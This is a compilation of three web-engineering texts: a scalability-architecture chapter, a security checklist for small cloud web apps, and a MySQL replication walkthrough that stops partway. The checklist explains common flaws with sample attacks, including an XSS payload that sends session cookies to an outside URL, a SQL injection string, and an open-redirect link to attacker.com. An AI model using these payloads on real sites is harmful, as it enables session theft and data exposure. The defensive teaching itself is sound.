Architecture of the Scalability Evolution: From a Single Server to a Global Audience


As a young engineer I used to build web applications that were hosted on a single server, and this is probably how most of us get started. During my career I have worked for different companies and I have witnessed applications in different scalability evolution stages. Before we go deeper into scalability, I would like to present some of these evolution stages to better explain how you go from a single server sitting under your desk to thousands of servers spread all over the world. I will keep it at a very high level here, as I will go into more detail in later chapters. Discussing evolution stages will also allow me to introduce different concepts and gradually move toward more complex topics. Keep in mind that many of the scalability evolution stages presented here can only work if you plan for them from the beginning. In most cases, a real-world system would not evolve exactly in this way, as it would likely need to be rewritten a couple of times. Most of the time, a system is designed and born in a particular evolution stage and remains in it for its lifetime, or manages to move up one or two steps on the ladder before reaching its architectural limits.

Single-Server Configuration 

Let’s begin with a single-server setup, as it is the simplest configuration possible and this is how many small projects get started. In this scenario, I assume that your entire application runs on a single machine. Figure 1-1 shows how all the traffic for every user request is handled by the same server. Usually, the Domain Name System (DNS) service is provided by the hosting company as a paid service and does not run on your own server. In this scenario, users connect to the DNS to obtain the Internet Protocol (IP) address of the server where your website is hosted. Once the IP address is obtained, they send Hypertext Transfer Protocol (HTTP) requests directly to your web server. Since your setup consists of only one machine, it needs to perform all the duties necessary to make your application run. It may run a database management system (like MySQL or Postgres), as well as serve images and dynamic content from within your application.


Figure 1-1 shows the distribution of traffic in a single-server configuration. Clients would first connect to the DNS server to resolve the IP address of your domain, and then they would start requesting multiple resources from your web server. Any web pages, images, Cascading Style Sheet (CSS) files, and videos have to be generated or served by your server, and all of the traffic and processing will have to be handled by your single machine. I use different weights of arrows on the diagram to indicate the proportion of traffic coming to each component. An application like this would be typical of a simple company website with a product catalog, a blog, a forum, or a self-service web application. Small websites may not even need a dedicated server and can often be hosted on a virtual private server (VPS) or on shared hosting.

For sites with low traffic, a single-server configuration may be enough to handle the requests made by clients. There are many reasons, though, why this configuration is not going to take you far scalability-wise:
▶ Your user base grows, thereby increasing traffic. Each additional user creates load on the server, and serving each user consumes more resources, including memory, CPU time, and disk input/output (I/O).
▶ Your database grows as you continue to add more data. As this happens, your database queries begin to slow down due to the extra CPU, memory, and I/O requirements.
▶ You extend your system by adding new functionality, which makes user interactions require more system resources.
▶ You experience any combination of these factors.

Making the Server Stronger: Scaling Vertically
There are a number of ways to scale vertically:
▶ Adding more I/O capacity by adding more hard drives in Redundant Array of Independent Disks (RAID) arrays. I/O throughput and disk saturation are the main bottlenecks in database servers. Adding more drives and setting up a RAID array can help to distribute reads and writes across more devices. In recent years, RAID 10 has become especially popular, as it gives both redundancy and increased throughput. From an application perspective, a RAID array looks like a single volume, but underneath it is a collection of drives sharing the reads and writes.
▶ Improving I/O access times by switching to solid-state drives (SSDs). Solid-state drives are becoming more and more popular as the technology matures and prices continue to fall. Random reads and writes using SSDs are between 10 and 100 times faster, depending on benchmark methodology. By replacing disks, you can decrease I/O wait times in your application. Unfortunately, sequential reads and writes are not much faster, and you will not see such a massive performance increase in real-world applications. In fact, most open-source databases (like MySQL) optimize data structures and algorithms to favor sequential disk operations rather than depending on random-access I/O. Some data stores, such as Cassandra, go even further, using solely sequential I/O for all writes and most reads, making SSDs even less attractive.
▶ Reducing I/O operations by increasing RAM. (Even 128GB RAM is affordable nowadays if you are hosting your application on your own dedicated hardware.) Adding more memory means more space for the file system cache and more working memory for the applications. Memory size is especially important for efficiency of database servers.
▶ Improving network throughput by upgrading network interfaces or installing additional ones. If your server is streaming a lot of video/media content, you may need to upgrade your network provider’s connection or even upgrade your network adapters to allow greater throughput.
▶ Switching to servers with more processors or more virtual cores. Servers with 12 and even 24 threads (virtual cores) are affordable enough to be a reasonable scaling option. The more CPUs and virtual cores, the more processes can execute at the same time. Your system becomes faster, not only because processes do not have to share the CPU, but also because the operating system will have to perform fewer context switches to execute multiple processes on the same core.

Figure 1-2 shows the approximate relationship of price per capacity unit and the total capacity needed. It shows that you can scale up relatively cheaply at first, but beyond a certain point, adding more capacity becomes extremely expensive. For example, getting 128GB of RAM (as of this writing) could cost you $3,000, but doubling that to 256GB could cost you $18,000, which is much more than double the 128GB price.


Isolation of Services
Vertical scalability is not the only option at this early stage of evolution. Another simple solution is moving different parts of the system to separate physical servers by installing each type of service on a separate physical machine. In this context, a service is an application like a web server (for example, Apache) or a database engine (for example, MySQL). This gives your web server and your database a separate, dedicated machine. In the same manner, you can deploy other services like File Transfer Protocol (FTP), DNS, cache, and others, each on a dedicated physical machine.
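In practice, this move is often just a configuration change: the application stops talking to a database on localhost and points at a dedicated machine instead. A minimal sketch, with hypothetical host names and settings:

# before: web server and database share one machine
# db_host = localhost
# after: the database runs on its own dedicated server
db_host = db1.internal.example.com
db_port = 3306
db_name = app_production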

A cache is a server or service focused on reducing the latency and the resources needed to generate a result, by serving previously generated content. Caching is a very important technique for scalability.

Content Delivery Network: Scalability for Static Content
As applications grow and get more customers, it becomes beneficial to offload some of the traffic to a third-party content delivery network (CDN) service.


A content delivery network is a hosted service that takes care of global distribution of static files like images, JavaScript, CSS, and videos. It works as an HTTP proxy. Clients that need to download images, JavaScript, CSS, or videos connect to one of the servers owned by the CDN provider instead of your servers. If the CDN server does not have the requested content yet, it asks your server for it and caches it from then on. Once the file is cached by the CDN, subsequent clients are served without contacting your servers at all.
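For example, a page might stop referencing assets on your own domain and point at a CDN hostname instead, with the CDN pulling from your server only on a cache miss. The host names below are purely illustrative:

<!-- before: the image is generated and served by your own web server -->
<img src="https://www.example.com/images/logo.png">
<!-- after: the CDN serves it, contacting your server only if it is not cached yet -->
<img src="https://cdn.example.com/images/logo.png">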


Distributing the Traffic: Horizontal Scalability 

All of the evolution stages discussed so far were rather simple modifications to the single-server configuration. Horizontal scalability, on the other hand, is much harder to achieve and in most cases it has to be considered before the application is built. In some rare cases, it can be “added” later on by modifying the architecture of the application, but it usually requires significant development effort. I will describe different horizontal scalability techniques throughout this book, but for now, let’s think of it as running each component on multiple servers and being able to add more servers whenever necessary. Systems that are truly horizontally scalable do not need strong servers—quite the opposite; they usually run on lots and lots of cheap “commodity” servers rather than a few powerful machines.





Scalability for a Global Audience
The largest websites reach the final evolution stage: scalability for a global audience. Once you serve millions of users spread across the globe, you will require more than a single data center. A single data center can host plenty of servers, but clients located on other continents will experience a degraded user experience, since every request must travel to that one location.

GeoDNS is a DNS service that allows domain names to be resolved to IP addresses based on the location of the customer. Regular DNS servers receive a domain name, like yahoo.com, and resolve it to an IP address, like 206.190.36.45. GeoDNS behaves the same way from the client’s perspective, but it can return a different IP address for the same domain depending on where the client is located, directing each user to the nearest data center.
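As a purely illustrative example (addresses taken from the documentation ranges), two clients resolving the same name could receive different answers:

client in Frankfurt:  www.example.com -> 198.51.100.20  (EU data center)
client in Oregon:     www.example.com -> 203.0.113.40   (US data center)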

An edge cache is an HTTP cache server located near the customer, allowing part of the HTTP traffic to be served from a cache close to the user. Requests from the customer’s browser go to the edge-cache server. The server can then decide to serve the page from the cache, or it can assemble the missing pieces of the page by sending background requests to your web servers. It can also decide that the page is uncacheable and delegate fully to your web servers. Edge-cache servers can serve entire pages or cache fragments of HTTP responses.






A load balancer is a software or hardware component that distributes traffic coming to a single IP address over multiple servers, which are hidden behind the load balancer. Load balancers are used to share the load evenly among multiple servers and to allow dynamic addition and removal of machines. Since clients can only see the load balancer, web servers can be added at any time without service disruption.
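A minimal sketch of this idea using nginx as a software load balancer (the backend addresses are placeholders); adding a web server is just one more server line:

upstream web_backend {
    server 10.0.0.11;
    server 10.0.0.12;
    server 10.0.0.13;
}

server {
    listen 80;
    location / {
        # clients only ever see this host; requests are spread across the pool
        proxy_pass http://web_backend;
    }
}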

The second layer of our stack is the web application layer. It consists of web application servers (4) responsible for generating the actual HTML of our web application and handling clients’ HTTP requests. These machines often use a lightweight web framework (PHP, Java, Ruby, Groovy, etc.) with a minimal amount of business logic, since the main responsibility of these servers is to render the user interface. All the web application layer is supposed to do is handle the user interactions and translate them into internal web service calls. The simpler and “dumber” the web application layer, the better. By pushing most of your business logic down to web services, you allow more reuse and reduce the number of changes needed, since the presentation layer is the one that changes most often.

The third layer of our stack consists of web services (7). It is a critical layer, as it contains most of our application logic. We keep front-end servers simple and free of business logic since we want to decouple the presentation layer from the business logic. By creating web services, we also make it easier to create functional partitions. We can create web services specializing in certain functionality and scale them independently. For example, in an e-commerce web application, you could have a product catalog service and a user profile service, each providing very different types of functionality and each having very different scalability needs.

Since both front-end servers (4) and web services (7) should be stateless, web applications often deploy additional components, such as object caches (5) and message queues (6). Object cache servers are used by both front-end application servers and web services to reduce the load put on the data stores and to speed up responses by storing partially precomputed results.
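The usual pattern here is cache-aside: check the cache first, fall back to the data store on a miss, and populate the cache for the next request. A minimal Python sketch in which the cache client and query function are placeholders:

def get_user_profile(cache, db, user_id):
    key = "user_profile:" + str(user_id)
    profile = cache.get(key)              # try the object cache first
    if profile is None:
        profile = db.query_user(user_id)  # cache miss: hit the data store
        cache.set(key, profile, ttl=300)  # keep the precomputed result for 5 minutes
    return profile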

The fourth layer of our stack is the data persistence layer (8) and (9). This is usually the most difficult layer to scale horizontally, so we’ll spend a lot of time discussing different scaling strategies and horizontal scalability options for it. This is also an area of rapid development of new technologies labeled as big data and NoSQL.

The data layer has become increasingly exciting in the past ten years, and the days of a single monolithic SQL database are gone. As Martin Fowler says, it is an era of polyglot persistence, where multiple data stores are used by the same company to leverage their unique benefits and to allow better scalability.


Overview of the Application Architecture
So far, we’ve looked at the infrastructure and scalability evolution stages. Let’s now take a high-level look at the application itself. The application architecture should not revolve around a framework or any particular technology. Architecture is not about Java, PHP, PostgreSQL, or even database schema. Architecture should revolve around the business model. There are some great books written on domain-driven design and software architecture1–3 that can help you get familiar with best practices of software design. To follow these best practices, we put business logic in the center of our architecture. It is the business requirements that drive every other decision. Without the right model and the right business logic, our databases, message queues, and web frameworks are useless. Moreover, it is irrelevant whether the application is a social networking website, a pharmaceutical service, or a gambling app—it will always have some business needs and a domain model. By putting that model in the center of our architecture, we make sure that other components surrounding it serve the business, not the other way around. By placing technology first, we may get a great Rails application, but it may not be a great pharmaceutical application.

A domain model is created to represent the core functionality of the application in the words of business people, not technical people. The domain model explains key terms, actors, and operations, without caring about technical implementation. The domain model of an automated teller machine (ATM) would mention things like cash, account, debit, credit, authentication, security policies, etc. At the same time, the domain model would be oblivious to the hardware and software implementation of the problem. The domain model is a tool for creating our mental picture of the business problems that our application is supposed to solve.



The front end should have a single responsibility: being the user interface. The user can be interacting with the application via web pages, mobile applications, or web service calls. No matter what the actual delivery mechanism is, the front-end application should be the layer translating between the public interface and internal service calls. The front end should be considered as “skin,” or a plugin of the application, something used to present the functionality of the system to customers. It should not be considered the heart or the center of the system.

Front-end code will be closely coupled to the templates and the web framework of our choice (for example, Spring, Rails, Symfony). It will be constrained by the user interface, user experience requirements, and the web technologies used. Front-end applications will have to be developed in a way that allows communication over HTTP, including AJAX and web sessions. By hiding all of that within the front-end layer, we can keep our services layer simpler and focused solely on the business logic, not on presentation and web-specific technologies. Templating, web flows, and AJAX are all presentation-specific problems. Keeping them separate from your main business logic allows for fast and independent changes. Having the front end developed as a separate application within our system gives us another advantage: we can use a different technology stack to develop it. It is not unreasonable to use one technology to develop web services and a different one to develop the front-end application.

As an example, you could develop the front end using Groovy, PHP, or Ruby, and web services could be developed in pure Java.

Web services are where most of the processing has to happen, and also the place where most of the business logic should live. 



Minimum Viable Security Checklist for a Cloud-Based Web Application

This article is written for lone developers or small teams who want to make sure they have their bases covered from a security perspective. The focus is mostly on dynamic web applications hosted on cloud services like Amazon Web Services (AWS) or Google Cloud Platform (GCP). It is not meant as an exhaustive guide, just a list of low-hanging fruit that you can easily address early on to prevent the most major, obvious software security issues.
I’ve organized the guide by starting with the network layer and moving up to the application, since that seems to be how most penetration tests and real-world attacks progress.

1. Close All Unnecessary Ports on Your Web Servers

Every open port on a host is a potential foothold into your systems for a remote attacker. Nowadays it’s trivial for an attacker to scan thousands of ports across a wide range of IPs looking for known versions of insecure services (a technique called “banner grabbing”). Once they’ve found a few entry points, it’s easy to search for and run exploits against those services to gain access to the machine.
The operating system of your web server’s VM may come with all sorts of default services – to be helpful! These may include things like FTP servers, proxy servers, and more – but if you’re not interested in securing, patching, and maintaining those services over time, make sure they’re turned off and hidden from the outside world.
You could use something on the server like iptables, or you could rely on your cloud server provider’s firewall product to disallow all traffic to your web servers that’s not on the default ports for HTTP (80) or SSL (443).
If you need to leave SSH open for manual server administration, move that to a non-standard port (something besides port 22) to avoid naive crawlers and script kiddies constantly banging on the door.
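As a sketch, an iptables policy along those lines might look like the following, assuming SSH has been moved to port 2222 (adapt to your distribution and your firewall tooling):

# allow loopback, established connections, web traffic, and SSH on a non-standard port
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j ACCEPT
iptables -A INPUT -p tcp --dport 2222 -j ACCEPT
# drop everything else
iptables -P INPUT DROP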

2. Properly Secure the SSH Connections to Your Web Servers

One day, when you’re a big company with a huge cloud infrastructure team, you’ll have all sorts of automation set up and you won’t ever need to manually administer servers over SSH. You’ll treat them like cattle, not pets.
But until then, you’re likely going to need SSH access to your machines for manual configuration changes as your infrastructure is still maturing. That’s okay, but here’s how to do it safely.
First things first, you should disable root login. The root user is the biggest target for attackers, since it is simultaneously (1) the most common username across servers and (2) the most privileged account on the system. This makes root a goldmine for anyone trying to gain access to your web servers.
Disabling root SSH access is as simple as adding the following line to the end of your /etc/ssh/sshd_config file on the server:
PermitRootLogin no
While you’re in that file, it’s also a great idea to disable password authentication for SSH connections altogether. You can do that by adding the following line (it may already be there, and you may simply need to uncomment it):
PasswordAuthentication no
Instead, you should be using public keys to control SSH access. If you’ve never used public keys for anything before, it does take a bit of work to set up initially, but it’s very secure and much easier to manage in the long run.
Make sure you add your own machine’s public key to the ~/.ssh/authorized_keys file for the SSH user you’ll be using, as shown below. This also makes it easy to revoke someone’s access down the line: simply remove their laptop’s public key from the ~/.ssh/authorized_keys file and they’ll be locked out, with no need to rotate SSH passwords and force everyone else to change.
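A typical key setup, run from your own laptop; the user and host below are placeholders:

# generate a key pair locally (if you don't already have one)
ssh-keygen -t ed25519
# append your public key to ~/.ssh/authorized_keys on the server
ssh-copy-id deploy@your-server.example.com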

3. Hide Your Backing Services from the Internet

If you’re following my MVP scalable architecture (which you should be!), you’ll have your database server running on a separate host from your web server(s). You want to ensure that your application’s backing services – like the database, and any caching layers like redis or memcached – cannot be accessed by someone outside your trusted network.
At the very least, drop all traffic that isn’t coming from a whitelist of your web servers’ IP addresses. However, this can quickly become a pain to maintain manually if you’re adding or removing web servers a lot.
An even better approach is to put all of the backing services hosts in a private network that can’t be seen from outside of the network. You can usually set this up as a Virtual Private Cloud (VPC) with any cloud provider like Google Cloud or AWS.
In fact, this is the exact use-case that AWS spells out for a VPC on their marketing homepage:
For example, you can create a public-facing subnet for your web servers that has access to the Internet, and place your backend systems such as databases or application servers in a private-facing subnet with no Internet access.
Note that, on top of all of this, you should still be using passwords to access the backing services, as an extra layer of defense in case an attacker does get inside your network.

4. Never Serve Files Off the Web Server’s File System

There’s really no reason you should ever be serving files directly off of the file system from your web servers these days.
There are all sorts of ways to accidentally misconfigure things and allow anyone to traverse the source code or other contents of your web server’s file system. Save yourself the headache and avoid using things like nginx’s root directive or Apache’s DocumentRoot directive in your frontend web server. In fact, the nginx docs on “common mistakes” specifically list a few bad uses of the root directive – take heed!
This is a performance recommendation as much as it is a security recommendation. Static resources like CSS, javascript, and images that belong to your application should be hosted on a more fitting static file host like AWS S3 or Google’s Cloud Storage.

5. Serve User Generated Content on a Different Domain

Continuing the last point, the other place where applications can get into trouble with serving static files is when they’re serving user-generated content like uploaded profile pictures or document attachments.
Make sure you serve any user-uploaded content from a completely different domain from your main application. Many big sites already do this:
  • facebook uses fbcdn.net
  • github uses githubusercontent.com
  • twitter uses pbs.twimg.com
If users can upload HTML documents and have them hosted on your application’s primary domain, that’s an excellent way to set up phishing opportunities for attackers. Serving user content from your domain can also fool users into thinking malicious content is actually legitimate content from your company, as the FCC found out last fall.
Users could also upload malicious javascript that would be run by the browser with the same trust level as your application’s javascript code, allowing it to tamper with your site’s cookies and potentially steal users’ credentials, sessions, or other data.

6. Avoid SQL Injections (SQLI) By Properly Using an ORM

For the transactional needs of the average relational database, there’s no reason not to be using an Object Relational Mapper (ORM) to interface with your database.
An ORM saves you from having to write a ton of boilerplate code for mundane tasks like generating SQL statements and turning database rows into objects you can easily work with in code.
From a security standpoint, an ORM will also save you from SQL injection attacks (SQLI), where a malicious user might try to extract information from your database by creating malicious payloads.
Imagine a web application with a URL like: http://example.com/user/123. The code that runs on a request for that page will probably grab the user ID from the URL and use it to look up the user, running a SQL query that looks like
SELECT * FROM users WHERE id = 123
Now imagine a malicious user were to navigate to a specially crafted URL such as http://example.com/user/NULL+OR+1=1. Without proper escaping, the server would generate a SQL expression like this and send that off to the database.
SELECT * FROM users WHERE id = NULL OR 1=1
Because of the “OR 1=1”, that WHERE clause would match every single row in the users table, meaning the database would return a list of every user, and the results might be rendered to the page. Not ideal!
An ORM would turn that into the following safe query, which would simply match no rows.
"SELECT * FROM users WHERE id = %s", ("NULL OR 1=1")
If you do have a special use-case that your ORM doesn’t support and you find yourself having to write raw SQL, always ensure that you’re using prepared statements or parameterized queries and never manually building SQL statements with string concatenation or variable substitution.
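As a concrete illustration, here is a minimal sketch using Python’s built-in sqlite3 module (the same placeholder-binding pattern applies to any DB-API driver); the table and data are invented for the example:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice')")

user_input = "NULL OR 1=1"  # the malicious value taken from the URL

# UNSAFE: string concatenation turns the payload into SQL and returns every row
# conn.execute("SELECT * FROM users WHERE id = " + user_input)

# SAFE: the driver binds the value as a literal, which matches no rows
rows = conn.execute("SELECT * FROM users WHERE id = ?", (user_input,)).fetchall()
print(rows)  # []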

7. Avoid Cross-Site Scripting (XSS) by Using an HTML Template Library

You should be using a template library for rendering HTML documents and automatically escaping HTML characters. Like an ORM, a good template library not only saves you the hassle of writing lots of boilerplate code, it also adds some security benefits.
In any dynamically generated web application, user-generated content will be mixed in directly with the HTML you’ve written for your application to render the page.
Without proper XSS filters, a user could set their username to something like the following (what a mouthful!):
<script>i = new XMLHttpRequest(); i.open('GET', 'https://example.com/receive-cookies/' + document.cookie, true); i.send();</script>
Then, whenever a user navigated to that attacker’s profile, your backend would combine that “username” with the rest of the HTML on the page. The attacker’s payload would be run and trusted by the user’s browser as if it were javascript from your application and users would unknowingly have their session cookies sent to an attacker’s server. Not ideal!
A proper template library would turn the above code into
&lt;script&gt;i = new XMLHttpRequest(); i.open('GET', 'https://example.com/receive-cookies/' + document.cookie, true); i.send();&lt;/script&gt;
rendering it invalid as an HTML <script> tag and harmless (and weird looking) to users.
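As a minimal illustration, Python’s standard library can do this escaping by hand (real template engines such as Jinja2 apply it automatically):

import html

username = "<script>alert('xss')</script>"
print(html.escape(username))
# &lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;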
From time to time, you may find yourself needing to disable the default escaping in order to pass properly formatted data to the frontend – for example, if you’re “rendering” some JSON on the server in order to hand it to javascript on the frontend.
Admittedly, I once wrote a security bug for a client doing exactly that. While we initially only passed “trusted” content that I assumed would be safe to render, the page evolved over time and we added some user-generated content to that JSON, which created a potential XSS vulnerability.
XSS bugs are the most common type of security vulnerabilities across all industries according to Hacker One’s latest report and they can sneak in over time if you’re not careful.

8. Hash and Salt Your Users’ Passwords

If this is the first time you’re hearing someone say this, you should hang out on web development forums more often, because this is one of the most common – and costly – mistakes made by new or junior web developers.
There’s no reason to ever store your users’ passwords in plaintext in your database. The current state of the art is to add a random, unique salt to each password and then hash it with an intentionally slow, tunable algorithm like bcrypt. But really, you should use a library for this that comes with sane defaults.
Never try to build your own crypto systems, and that goes for password security as well.
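A minimal sketch, assuming the third-party bcrypt package (pip install bcrypt), which generates the salt and manages the work factor for you:

import bcrypt

password = b"correct horse battery staple"

# gensalt() produces a random salt and embeds the cost factor in the hash
hashed = bcrypt.hashpw(password, bcrypt.gensalt())

# later, at login time, compare a candidate password against the stored hash
if bcrypt.checkpw(password, hashed):
    print("password accepted")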

9. Require Your Users to Create Strong Passwords

This one may not seem like it should be part of an application or network security checklist – if the user makes a bad password and gets hacked, that’s their fault! Right?
If users are getting their accounts compromised, it’s going to reflect poorly on your application, regardless of whose fault it is.
Forget about funky password requirements like mixing cases, requiring numbers, or anything complex like that. Those are old standards that are now outdated.
Instead, set a minimum length of something like 8-12 characters (no max length limit – we are storing fixed-length hashes (#8) in our DB, after all!) and then check any new passwords against a database of the most common passwords found in breaches.
That should take all of one hour to implement and will help minimize the success of any brute-force password guessing attacks against your product.
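A minimal sketch of such a check; common_passwords.txt is a hypothetical one-password-per-line breach list (several are freely available):

# load the breach list once at startup
with open("common_passwords.txt") as f:
    COMMON_PASSWORDS = {line.strip() for line in f}

def password_is_acceptable(password: str) -> bool:
    # minimum length only; no maximum, since we store fixed-length hashes anyway
    return len(password) >= 10 and password not in COMMON_PASSWORDS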

10. Serve Your Site Over SSL

Serving your site over SSL protects your site’s users from having their connections tampered with – either by an attacker on their network (say, a public wifi hotspot) or some intermediary along the line, like a rogue Internet Service Provider (ISP).
If you’re not familiar with how SSL works, you can learn what you need to know here. Serving your site over SSL also has SEO benefits as Google has said it uses SSL (as well as page load time) as a ranking signal when deciding what sites to return in the results for a query.
You can get a free SSL certificate from Let’s Encrypt, and it takes only a few minutes to set up with their certbot, so the benefits far outweigh the minimal costs of setting one up.
This is much easier if you simply start serving your site over SSL from day one rather than trying to move to it down the line, since you’ll catch mixed content warnings as you add new content to the site over time, instead of having to go back and fix them all at once if you move to SSL later on.
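For example, on a server running nginx, obtaining and installing a certificate can be as simple as the line below (assuming certbot is installed and the domain already points at the server):

sudo certbot --nginx -d example.com -d www.example.com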

11. Don’t Use Cookies for Session Storage

Server-side sessions are a common feature of many web application frameworks. The idea is you can tuck some information “into the session” and it will be available again later for subsequent requests from that same user.
By default, some session implementations simply store the session values that your application sets in a cookie on the user’s browser, maybe base64 encoding it for “obfuscation” purposes.
But if you’re putting anything remotely sensitive in your session (say, the currently logged in user’s ID), then you don’t want to be trusting a user-editable cookie for something like that. A user could edit the cookie to change the ID and suddenly your application will give them access to another user’s account. Not ideal!
Instead, make sure you’ve configured a proper server-side session storage backend – something like a database or a cache service – and keep the session data in there.
You’ll still likely need to use cookies, but there’s an important distinction between using cookies to identify a user’s session versus using them to store information about the session.
In an ideal setup, you’ll simply set a cookie in the user’s browser called “session_id” and it will contain some long, unique value (like a UUID) that will be that user’s unique session identifier. When a request comes in, your session management system should look up that user’s session information in a backend system (like a database or cache) using the session ID in the cookie.
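A minimal sketch of that pattern, using an in-memory dict as a stand-in for the real backend store:

import uuid

session_store = {}  # stand-in for a database or cache

def create_session(user_id):
    session_id = str(uuid.uuid4())  # long, unique identifier for the cookie
    session_store[session_id] = {"user_id": user_id}
    return session_id               # set this as the "session_id" cookie value

def load_session(session_id):
    # the cookie carries only the ID; the session data lives server-side
    return session_store.get(session_id)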
You should make sure to inspect the cookies that your site is generating – login using an incognito browser to see what ends up getting set as you browse the site and perform various tasks. You shouldn’t see anything valuable sent to or from the browser.

12. Don’t Allow Open Redirects

Any page of your application that can respond with a redirect (say, a login page or error page) should never blindly redirect a user to a fully qualified URL. Instead, try to return a path-only Location header that keeps the user on the same domain.
The vulnerability here is that a malicious user could create a targeted phishing campaign against your site. They could set up a copy of your site on a different domain and then send someone a link to the open-redirector page on your site with a query argument that redirects to the attacker’s site.
Since users usually scan the domain but not the query arguments when deciding to trust a link, they’ll think the link is legitimate even though you redirected them to an attacker’s website.
This attack is particularly sneaky if it comes after a login page. Imagine someone sent one of your users a link to the following URL:
http://example.com/login?next=http%3A%2F%2Fattacker.com%2Fphishing-page.php
The user would be taken to your actual login page, where they would successfully login, and then be redirected to the next query argument – which, in this case, takes them off your site to a page an attacker is controlling.
If the attacker sets it up to look like your site, the user may be none the wiser if they don’t check the URL bar after logging in, and may be tricked into giving up information (“Please enter your password one more time…”).
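A minimal sketch of validating a next parameter so that only same-site, path-only redirects are allowed (the parameter name is just this example’s convention):

from urllib.parse import urlparse

def safe_redirect_target(next_url: str) -> str:
    parsed = urlparse(next_url)
    # reject absolute URLs ("http://attacker.com/...") and protocol-relative
    # ones ("//attacker.com/..."); allow only local paths like "/dashboard"
    if parsed.scheme or parsed.netloc or not next_url.startswith("/"):
        return "/"  # fall back to a safe default
    return next_url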

13. Use CSRF Tokens on Important Form Submissions

As the name implies, a “Cross-Site Request Forgery” is when an attacker on one site is able to trick a user into submitting a forged request on your site without the user realizing.
The canonical example is a bank transfer. If you’re a bank and you allow users to transfer funds with a request like
GET http://www.example.com/transfer_funds?amt=500&to_acct=12345
then a malicious attacker could simply embed a link like that somewhere innocuous (“Click here to win a free iPad!” on facebook). If a logged-in user of your site sees the link on another site and clicks it, they will have transferred the funds before they even realize what has happened.
The way you prevent this from happening on your site is by including so-called “CSRF tokens” in your forms. The basic implementation is that you generate a random CSRF token when you load the page that asks the user to submit or confirm some sort of transaction. You would hide this value in the HTML of the form using something like:
<input type="hidden" name="csrf_token" value="..." />
Then, when the user submits the form to confirm the transaction, you check both that the CSRF token is present and that it matches the previously set value before allowing the request to proceed. This way, an attacker embedding the example “bank transfer” link would hit a dead end, because the request would arrive without a correct CSRF token value. A minimal implementation is sketched below.
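A minimal sketch of generating and checking the token, assuming the kind of server-side session storage described in #11:

import hmac
import secrets

def issue_csrf_token(session):
    token = secrets.token_hex(32)  # unguessable random token
    session["csrf_token"] = token  # remember it in the server-side session
    return token                   # embed this in the hidden form field

def csrf_token_is_valid(session, submitted_token):
    expected = session.get("csrf_token", "")
    # constant-time comparison avoids leaking information through timing
    return hmac.compare_digest(expected, submitted_token)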

If you follow these steps, you will have a very secure base for launching and growing your product. All of your application’s data will be hidden from the public internet and your web servers will be locked down to only handle very specific types of traffic.
Your application will be secure against the most common vulnerabilities as well as some newer, more targeted phishing campaigns. You will be taking solid precautions to safeguard your users’ data and creating a secure experience for them in your app.
As your application begins to process a greater number of users and their data, there will be additional security steps you’ll want to think about down the line, but these steps that I’ve listed are the most basic ones that are easy to setup and should last you for a long time.
If you’re interested in learning more about securing web applications, I’d be remiss if I didn’t tell you about the Open Web Application Security Project (OWASP) “Top 10” guidelines that came out last year, although I’ve found it a bit too obtuse to be of much practical use to a lone developer or a small software team.

Configuring MySQL Replication (Master–Slave)




What Is MySQL Replication?

It is the process that lets you easily create multiple copies of a MySQL database by replicating them automatically from a master to a slave. This is useful for many reasons: it gives you a spare copy of your data in case something goes wrong, it lets you analyze data without querying the primary (master) database and hurting system performance, and it is also a simple means of scaling out.
This guide walks you through configuring MySQL replication with one master and one slave.



How Do You Configure MySQL Replication?

This walkthrough uses two servers, both running CentOS 6.6, with the following IP addresses:
  • 10.10.10.1 - Master Database
  • 10.10.10.2 - Slave Database

Configuring the MySQL Master

Step 1: install MySQL:
sudo yum install mysql-server mysql-client  
Step 2: make a backup copy of the original MySQL configuration file /etc/my.cnf:
cp /etc/my.cnf /etc/my.cnf.orig
Step 3: start configuring the MySQL master. The changes below go in the [mysqld] section. You can pick any natural number for the server-id, as long as it is unique and does not collide with any other server-id in your replication setup. I recommend choosing 1:
  • It is the first natural number, a natural and easy place to start.
  • It is harder to forget that 1 is the master’s server-id; the numbers after it belong to the slaves.
  • You get to be number one.
Add the following to the [mysqld] section:
# Enable binary logging & Replication
server_id           = 1  
log_bin             = /home/mysql/data/mysql-bin.log  

This is the heart of replicating a database from the MySQL master to the MySQL slave: the slave will copy every change recorded in the log_bin file.
If you want to replicate only selected databases to the slave, add the following line:
binlog_do_db = newdatabase
You can replicate more than one database by repeating this line for every database you want to copy.
Step 4: restart the MySQL service to apply the changes:
sudo service mysqld restart
Step 5: now open a MySQL shell to continue:
mysql -uroot -p
Step 6: grant replication access to the slave by creating a slave_user and giving it the replication privilege:
GRANT REPLICATION SLAVE ON *.* TO 'slave_user'@'10.10.10.2' IDENTIFIED BY 'password';  
FLUSH PRIVILEGES;  
Step 7: this step calls for a bit of care. Open a new terminal window, log in to the MySQL master, and open a MySQL shell.
Since the database being replicated is newdatabase, switch to it:
USE newdatabase;  
Next, lock the database to prevent any further changes to newdatabase:
FLUSH TABLES WITH READ LOCK;  
Then type:
SHOW MASTER STATUS;  
You will see a table of information similar to the one below:
mysql> SHOW MASTER STATUS;  
+------------------+----------+--------------+------------------+-------------------+
| File             | Position | Binlog_Do_DB | Binlog_Ignore_DB | Executed_Gtid_Set |
+------------------+----------+--------------+------------------+-------------------+
| mysql-bin.003894 | 44121282 |              |                  |                   |
+------------------+----------+--------------+------------------+-------------------+
1 row in set (0.00 sec)

mysql>  
These are the binary log file and the position from which the slave will start replicating. Write down the File and Position values; you will use them shortly.
If you run any other statement in this MySQL shell window, the database will automatically unlock. That is why you need to open yet another window for the next step.
Step 8: export the database using mysqldump in the new terminal window. Make sure you are at a bash shell, not inside the MySQL shell:
mysqldump -uroot -p --default-character-set=utf8 --opt newdatabase > newdatabase.sql  
Step 9: now go back to the MySQL shell window where you ran FLUSH TABLES WITH READ LOCK; and unlock the tables:
UNLOCK TABLES;  
QUIT;  
At this point you have finished configuring the MySQL master database.

Configuring the MySQL Slave

Step 1: log in to the MySQL slave server and open a MySQL shell. Create the new database; this is the one you will replicate from the master:
CREATE DATABASE newdatabase CHARACTER SET utf8;  
EXIT;  
Step 2: import the dump you exported in Step 8 of the master configuration:
mysql -uroot -p --default-character-set=utf8 newdatabase < newdatabase.sql
Step 3: now configure the MySQL slave. Before you start, back up the original MySQL configuration:
